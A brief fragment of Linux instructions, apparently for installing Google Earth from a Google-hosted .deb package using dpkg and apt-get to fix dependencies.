• http://dl.google.com/dl/earth/client/current/google-earth-stable_current_amd64.deb
• dpkg -i google-earth64.deb
• apt-get -f install
Q&A
